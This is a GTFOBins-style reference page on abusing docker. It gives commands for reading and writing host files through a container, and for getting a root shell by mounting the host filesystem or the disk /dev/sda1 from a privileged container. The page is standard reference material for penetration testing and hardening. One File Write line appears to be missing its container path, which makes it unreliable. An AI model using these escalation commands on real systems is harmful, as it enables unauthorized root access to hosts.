🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐚 GTFOBins / docker

docker

File Read

Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.

docker cp /path/to/input-file $CONTAINER_ID:input-file
docker cp $CONTAINER_ID:input-file /path/to/temp-file
cat /path/to/temp-file

File Write

Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.

echo DATA >/path/to/temp-file
docker cp /path/to/temp-file $CONTAINER_ID:temp-file
docker cp $CONTAINER_ID /path/to/output-file

Shell

docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh

This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.

docker run --rm -it --privileged -u root alpine
mount /dev/sda1 /mnt/
ls -la /mnt/
chroot /mnt /bin/bash